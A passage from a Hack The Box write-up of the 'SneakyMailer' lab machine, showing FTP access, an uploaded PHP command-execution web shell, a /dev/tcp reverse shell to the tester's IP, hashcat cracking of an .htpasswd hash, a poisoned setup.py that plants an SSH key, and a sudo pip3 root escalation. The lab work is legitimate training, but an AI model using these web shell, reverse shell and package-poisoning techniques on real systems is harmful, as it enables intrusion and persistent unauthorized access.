226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd ..
\250 Directory successfully changed.
ftp> get index.php
local: index.php remote: index.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for index.php (13742 bytes).
226 Transfer complete.
13742 bytes received in 0.00 secs (21.2061 MB/s)
ftp> cd scss
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             980 May 26 18:52 _buttons.scss
-rwxr-xr-x    1 0        0             733 May 26 18:52 _cards.scss
-rwxr-xr-x    1 0        0             454 May 26 18:52 _charts.scss
-rwxr-xr-x    1 0        0             356 May 26 18:52 _dropdowns.scss
-rwxr-xr-x    1 0        0            1139 May 26 18:52 _error.scss
-rwxr-xr-x    1 0        0             196 May 26 18:52 _footer.scss
-rwxr-xr-x    1 0        0             886 May 26 18:52 _global.scss
-rwxr-xr-x    1 0        0             893 May 26 18:52 _login.scss
-rwxr-xr-x    1 0        0               1 May 26 18:52 _mixins.scss
-rwxr-xr-x    1 0        0              85 May 26 18:52 _navs.scss
-rwxr-xr-x    1 0        0             239 May 26 18:52 _utilities.scss
-rwxr-xr-x    1 0        0            2477 May 26 18:52 _variables.scss
drwxr-xr-x    2 0        0            4096 May 26 18:52 navs
-rwxr-xr-x    1 0        0             504 May 26 18:52 sb-admin-2.scss
drwxr-xr-x    2 0        0            4096 May 26 18:52 utilities
226 Directory send OK.
ftp> get sb-admin-2.scss
local: sb-admin-2.scss remote: sb-admin-2.scss
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for sb-admin-2.scss (504 bytes).
226 Transfer complete.
504 bytes received in 0.00 secs (3.3379 MB/s)
ftp> cd utilities
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             596 May 26 18:52 _animation.scss
-rwxr-xr-x    1 0        0             389 May 26 18:52 _background.scss
-rwxr-xr-x    1 0        0             190 May 26 18:52 _border.scss
-rwxr-xr-x    1 0        0              64 May 26 18:52 _display.scss
-rwxr-xr-x    1 0        0              34 May 26 18:52 _progress.scss
-rwxr-xr-x    1 0        0              90 May 26 18:52 _rotate.scss
-rwxr-xr-x    1 0        0             699 May 26 18:52 _text.scss
226 Directory send OK.

I was able to successfully login, and began looking around. It appeared as if the ftp server location and files were the same as the live website. I exfiltrated some of the files to my machine for further analysis, but none of the files seemed to have anything interesting in them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
ftp> put php-code-exec.php
local: php-code-exec.php remote: php-code-exec.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
33 bytes sent in 0.00 secs (233.5258 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
--wxrw-rw-    1 1001     1001           33 Nov 11 12:49 php-code-exec.php
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
226 Directory send OK.

After testing some things in the FTP server, I realized that I had the ability to use the PUT command. Since this seemed to be the code for the site, I put a test file to see if I could access it from my browser.

1
2
3
4
5
6
<?php

$var=$_GET['var'];
system($var);

?>

Initial Foothold

Using this I was able to identify that I was running in the context of www-data.

, and that there were three users that could log into the machine: low, developer, and root

Next I tried adding my public SSH key to both low and developer since they could log in, but was unable to gain access with SSH since www-data could not write to those files.

Road to User

Further enumeration

got running processes, etc/passwd, could not add ssh keys, next tried reverse shell

1
2
3
4
5
6
7
8
9
10
11
GET /php-code-exec.php?var=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.174/46445+0>%261' HTTP/1.1

Host: dev.sneakycorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

sent my reverse shell, and immediately got a connection on my waiting netcat listener

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
zweilos@kali:~/htb/sneakymailer$ script sneaky-transcript
Script started, output log file is 'sneaky-transcript'.
┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ bash                
zweilos@kali:~/htb/sneakymailer$ nc -lvnp 46445
listening on [any] 46445 ...
connect to [10.10.14.174] from (UNKNOWN) [10.10.10.197] 60704
bash: cannot set terminal process group (725): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ python -c 'import pty;pty.spawn("/bin/bash")'
</dev$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ ^Z
[1]+  Stopped                 nc -lvnp 46445
zweilos@kali:~/htb/sneakymailer$ stty raw -echo
zweilos@kali:~/htb/sneakymailer$ nc -lvnp 46445

www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ export TERM=xterm-256color
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ id && hostname
id && hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sneakymailer

started enumeration (remembered to switch to bash this time since zsh seems to have problems with upgrading nc shells)

1
2
3
4
5
6
7
8
9
10
11
www-data@sneakymailer:~/sneakycorp.htb$ cd /home
www-data@sneakymailer:/home$ ls
low  vmail
www-data@sneakymailer:/home$ cd vmail
bash: cd: vmail: Permission denied
www-data@sneakymailer:/home$ ls -la
total 16
drwxr-xr-x  4 root  root  4096 May 14 17:10 .
drwxr-xr-x 18 root  root  4096 May 14 05:30 ..
drwxr-xr-x  8 low   low   4096 Jun  8 03:47 low
drwx------  5 vmail vmail 4096 May 19 21:10 vmail

in the /home directory there were only two folders, low, and vmail

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ ls -la
total 76
drwxrwxr-x 8 root developer  4096 Nov 11 13:23 .
drwxr-xr-x 3 root root       4096 Jun 23 08:15 ..
drwxr-xr-x 2 root root       4096 May 26 19:52 css
drwxr-xr-x 2 root root       4096 May 26 19:52 img
-rwxr-xr-x 1 root root      13742 Jun 23 09:44 index.php
drwxr-xr-x 3 root root       4096 May 26 19:52 js
drwxr-xr-x 2 root root       4096 May 26 19:52 pypi
drwxr-xr-x 4 root root       4096 May 26 19:52 scss
-rwxr-xr-x 1 root root      26523 May 26 20:58 team.php
drwxr-xr-x 8 root root       4096 May 26 19:52 vendor
www-data@sneakymailer:~/dev.sneakycorp.htb/dev$ cd ..
www-data@sneakymailer:~/dev.sneakycorp.htb$ ls
dev
www-data@sneakymailer:~/dev.sneakycorp.htb$ cd ..
www-data@sneakymailer:~$ ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb
www-data@sneakymailer:~$ cd pypi.sneakycorp.htb/
www-data@sneakymailer:~/pypi.sneakycorp.htb$ ls -la
total 20
drwxr-xr-x 4 root root     4096 May 15 14:29 .
drwxr-xr-x 6 root root     4096 May 14 18:25 ..
-rw-r--r-- 1 root root       43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi     4096 May 14 18:25 venv
www-data@sneakymailer:~/pypi.sneakycorp.htb$ cat .htpasswd 
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

found what looked like a hash for a user pypi in .htpasswd in the pypi.sneakycorp.htb folder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(zweilos㉿kali)-[~]
└─$ hash-identifier hashes                                                          
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.
--------------------------------------------------
 HASH: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Possible Hashs:
[+] MD5(APR)
--------------------------------------------------

the hash came up as type MD5(APR)

1
2
3
┌──(zweilos㉿kali)-[~]
└─$ hashcat --help | grep -i APR                                                    
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | FTP, HTTP, SMTP, LDAP Server

hashcat’s help ID’d it at an Apache MD5 hash

Finding user creds

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(zweilos㉿kali)-[~]
└─$ hashcat -a0 -m1600 --username htb/sneakymailer/hash /usr/share/wordlists/rockyou.txt         
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Wed Nov 11 15:52:56 2020 (2 mins, 18 secs)
Time.Estimated...: Wed Nov 11 15:55:14 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    25994 H/s (9.47ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3614208/14344385 (25.20%)
Rejected.........: 0/3614208 (0.00%)
Restore.Point....: 3613952/14344385 (25.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidates.#1....: souhern4u -> soucia

Started: Wed Nov 11 15:52:45 2020
Stopped: Wed Nov 11 15:55:16 2020

The password enabled me to log in to http://pypi.sneakycorp.htb:8080/ with the creds pypi:soufianeelhaoui

There was nothing interesting on either of the sites linked on this page however.

1
2
3
4
www-data@sneakymailer:~/pypkg$ su developer
Password: 
developer@sneakymailer:/dev/shm/pypkg$ id
uid=1001(developer) gid=1001(developer) groups=1001(developer)

I went back to the machine and tried to switch users to developer with the credentials mentioned in the email, and found myself logged in as developer.

1
2
3
4
5
6
7
developer@sneakymailer:/dev/shm/pypkg$ sudo -l

sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
[sudo] password for developer: 
Sorry, try again.
[sudo] password for developer: 
Sorry, user developer may not run sudo on sneakymailer.

I had a weird network hiccup that caused authentication to fail the first try, but then I found out that this user was not able to run commands with sudo

https://pypi.org/project/pypiserver/#upload-with-setuptools

On client-side, edit or create a ~/.pypirc file with a similar content:

1
2
3
4
5
6
7
8
9
10
11
12
13
    [distutils]
    index-servers =
      pypi
      local

    [pypi]
    username:<your_pypi_username>
    password:<your_pypi_passwd>

    [local]
    repository: http://localhost:8080
    username: <some_username>
    password: <some_passwd>

Then from within the directory of the python-project you wish to upload, issue this command:

1
    python setup.py sdist upload -r local

Then I wrote a setup.py python script as specified at https://packaging.python.org/tutorials/packaging-projects/#creating-setup-py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import setuptools
import os

if os.getuid() == 1000:
    with open("/home/low/.ssh/authorized_keys", "a") as fh:
        fh.write("\necdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCOQVWrtHkqJofpMNDvUFQlPj7KHcLwMRo5BghGIW8tEAdl2yU0GQ03g2gKnUE9bDGP5NCW6uuEBxSUw73QCYws= zweilos@kali")

long_description = "A sneaky pwn package"

setuptools.setup(
    name="sneakymailer-pwn", # Replace with your own username
    version="0.0.1",
    author="zweilos",
    author_email="zweilos@sneakymailer.htb",
    description="A small pwny package",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

I first tried writing my public SSH key to low but the script was being run in the context of developer and not being installed for some reason. I added a check to make sure that low (userID 1000) was the one running it. Next I followed the instructions to install the package into pypiserver

1
2
3
4
5
6
7
8
9
10
11
12
13
[distutils]
index-servers =
  pypi
  local

[pypi]
username:pypi
password:soufianeelhaoui

[sneaky]
repository: http://pypi.sneakycorp.htb:8080
username:pypi
password:soufianeelhaoui

I created the .pypirc file in my distribution’s directory, then set this to be developer’s home directory with export HOME=/dev/shm/pypi

User.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
writing sneakymailer_pwn.egg-info/PKG-INFO
writing dependency_links to sneakymailer_pwn.egg-info/dependency_links.txt
writing top-level names to sneakymailer_pwn.egg-info/top_level.txt
reading manifest file 'sneakymailer_pwn.egg-info/SOURCES.txt'
writing manifest file 'sneakymailer_pwn.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating sneakymailer-pwn-0.0.1
creating sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying files to sneakymailer-pwn-0.0.1...
copying setup.py -> sneakymailer-pwn-0.0.1
copying sneakymailer_pwn.egg-info/PKG-INFO -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/SOURCES.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/dependency_links.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
copying sneakymailer_pwn.egg-info/top_level.txt -> sneakymailer-pwn-0.0.1/sneakymailer_pwn.egg-info
Writing sneakymailer-pwn-0.0.1/setup.cfg
Creating tar archive
removing 'sneakymailer-pwn-0.0.1' (and everything under it)
running register
Registering sneakymailer-pwn to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/sneakymailer-pwn-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

It complained a bit that I didn’t create a readme, but it ran

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(zweilos㉿kali-[~/htb/sneakymailer]
└─$ ssh -i dev low@sneakycorp.htb   
The authenticity of host 'sneakycorp.htb (10.10.10.197)' can't be established.
ECDSA key fingerprint is SHA256:I1lCFRteozDGkqC/ZSE2SbHl8ISpJWhfu5nwn6LxbA0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'sneakycorp.htb' (ECDSA) to the list of known hosts.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$ cat user.txt 
06106e8ea4721e1a01714bf6ef000a88

Next I tried logging in with the ssh key I had made and was successful! I got that same temporary name resolution error when using sudo -l, where it seemed to hang for a minute, but this time I got a very interesting result!

1
2
3
4
5
6
low@sneakymailer:/dev/shm/fin$ pip3 install setup.py
Looking in indexes: http://pypi.sneakycorp.htb:8080/simple/
Collecting setup.py
  The repository located at pypi.sneakycorp.htb is not a trusted or secure host and is being ignored. If this repository is available via HTTPS we recommend you use HTTPS instead, otherwise you may silence this warning and allow it anyway with '--trusted-host pypi.sneakycorp.htb'.                            
  Could not find a version that satisfies the requirement setup.py (from versions: )
No matching distribution found for setup.py

A search for ways to privilege escalation with sudo and pip3 led to https://gtfobins.github.io/gtfobins/pip/

File write It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.

1
It needs an absolute local file path.
1
2
3
4
    export LFILE=/tmp/file_to_save
    TF=$(mktemp -d)
    echo "open('$LFILE','w+').write('DATA')" > $TF/setup.py
    pip install $TF

Path to Power (Gaining Administrator Access)

Enumeration as User

Getting a shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
low@sneakymailer:/dev/shm$ TF=$(mktemp -d)
low@sneakymailer:/dev/shm$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:/dev/shm$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.eLbVbsYr88
# id && hostname
uid=0(root) gid=0(root) groups=0(root)
sneakymailer
# cat root.txt  
cat: root.txt: No such file or directory
# ls -la
total 20
drwx------  3 root root 4096 Nov 11 20:49 .
drwxrwxrwt 16 root root 4096 Nov 11 20:49 ..
-rw-r--r--  1 root root  185 Nov 11 20:49 pip-delete-this-directory.txt
drwxr-xr-x  2 root root 4096 Nov 11 20:49 pip-egg-info
-rw-r--r--  1 root root   86 Nov 11 20:49 setup.py
# pwd
/tmp/pip-req-build-2ueqz020

I was not in the directory I expected at first…the shell spawned in the tmp directory where the “module” was installed to

Root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# cd /root
# ls -la
total 44
drwx------  6 root root 4096 Jun 10 04:20 .
drwxr-xr-x 18 root root 4096 May 14 05:30 ..
lrwxrwxrwx  1 root root    9 May 26 22:32 .bash_history -> /dev/null
-rw-r--r--  1 root root  619 May 14 12:57 .bashrc
drwxr-xr-x  3 root root 4096 May 14 15:29 .cache
drwx------  3 root root 4096 Jun 10 04:20 .config
drwx------  3 root root 4096 May 15 13:10 .gnupg
drwxr-xr-x  3 root root 4096 May 14 12:57 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  977 May 14 13:31 .python_history
-rwx------  1 root root   33 Nov 11 01:09 root.txt
-rw-r--r--  1 root root   66 May 27 13:00 .selected_editor
# cat root.txt
81337e5b7eb0c72e251736d031a72998

fine

Thanks to <box_creator> for something interesting or useful about this machine.

If you have comments, issues, or other feedback, or have any other fun or useful tips or tricks to share, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!

If you like this content and would like to see more, please consider buying me a coffee!

This post is licensed under CC BY 4.0 by the author.